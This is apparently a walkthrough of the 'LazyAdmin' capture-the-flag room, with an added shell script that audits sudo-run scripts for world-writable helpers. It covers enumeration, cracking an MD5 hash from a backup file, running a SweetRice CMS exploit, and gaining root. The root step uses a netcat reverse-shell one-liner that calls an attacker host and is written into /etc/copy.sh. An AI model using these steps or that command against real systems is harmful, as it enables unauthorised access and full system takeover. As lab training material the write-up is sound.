Hey 👋, welcome back to the series. It is time to solve another challenge: “LazyAdmin”.
Have some fun! There might be multiple ways to get user access in LazyAdmin.
So let’s start!
First we need to enumerate the box. We run an nmap scan to find the open ports.
Command: nmap -sV -sC <IP>
After executing the command, we can see the open ports and the services running on them. Here two ports are open: HTTP and SSH.
Let’s try to access the http website running on it.
This is a default page, so let’s look for other endpoints on the website. For that we use a directory brute-forcing tool, gobuster.
Command: gobuster dir -u http://<IP>/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
We can see “/content” endpoint. So let’s access this endpoint.
Let’s check for more directories under it.
Command: gobuster dir -u http://<IP>/content/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
We get many directories now. Checking them, “/as” contains a login page and “/inc” contains files.
Here we find a mysql_bakup file containing credentials.
We can see the username is manager and the password is stored as a hash, which needs to be cracked.
Command: hashcat -m 0 /root/hash.txt /usr/share/wordlists/rockyou.txt (mode 0 is plain MD5)
Now using the credentials, we can login to the page.
We can see the SweetRice CMS version number. Let’s check for an exploit for that CMS version.
Download the exploit.
Now we run the exploit we downloaded. Reading through it, it needs a file to get the reverse shell, so we download a reverse shell script.
Note: In the reverse shell script, change the IP and port to match the Netcat listener you open.
Command: python3 40716.py
Hurray, we got a reverse shell. Now let’s look for the flag.
Command: find / -name user.txt 2>/dev/null
It’s time to escalate our privilege to root.
We can check the sudo permissions of the current user with the following command.
Command: sudo -l
Let’s check what’s in the “backup.pl” file. When viewed, it invokes a copy.sh script, and that file is writable by us.
So what we can do is write a reverse shell one-liner into “copy.sh” and open a Netcat listener.
Command: echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker IP> 5555 >/tmp/f" > /etc/copy.sh
Command: sudo /usr/bin/perl /home/itguy/backup.pl
Run the above command and we get the shell. Let’s check for the flag.
Well, we are root now!
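The root path works because a script that sudo allows (backup.pl) invokes a helper (copy.sh) that other users can write. As an added defender-side example, not part of the original writeup, here is a small audit function that flags such writable dependencies; it runs against a constructed fixture (hypothetical temp-dir copies of backup.pl and copy.sh), not against the room’s real paths.

```shell
#!/bin/sh
# Added example: audit a sudo-permitted script for helper files it references
# that are writable by "other". Paths in the fixture are constructed for the demo.

# Print 1 if the file's "other" write bit is set, else 0 (parses ls -l, portable).
other_writable() {
    mode=$(ls -ld "$1" 2>/dev/null | cut -c9)
    [ "$mode" = "w" ] && echo 1 || echo 0
}

# List absolute paths mentioned in a script, e.g. /etc/copy.sh inside
# system("sh /etc/copy.sh"). One path per line, de-duplicated.
referenced_paths() {
    grep -o '/[A-Za-z0-9_./-]*' "$1" | sort -u
}

# For a sudo-permitted script, report referenced regular files that others can
# write. Returns 0 when clean, 1 when at least one writable dependency exists.
audit_sudo_script() {
    rc=0
    for p in $(referenced_paths "$1"); do
        [ -f "$p" ] || continue
        if [ "$(other_writable "$p")" = "1" ]; then
            echo "WRITABLE: $p (invoked from $1)"
            rc=1
        fi
    done
    return $rc
}

# Constructed fixture mirroring the room's layout: a backup.pl that runs a
# helper shell script which has been left mode 0777. Prints the fixture dir.
setup_fixture() {
    dir=$(mktemp -d)
    printf 'echo backup\n' > "$dir/copy.sh"
    chmod 777 "$dir/copy.sh"
    printf 'system("sh %s");\n' "$dir/copy.sh" > "$dir/backup.pl"
    chmod 755 "$dir/backup.pl"
    echo "$dir"
}
```

Tightening copy.sh to 0755 (or 0700, owned by root) makes the audit pass and removes this escalation path.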
Hurrah!! LazyAdmin is now over. Thank you for sticking around.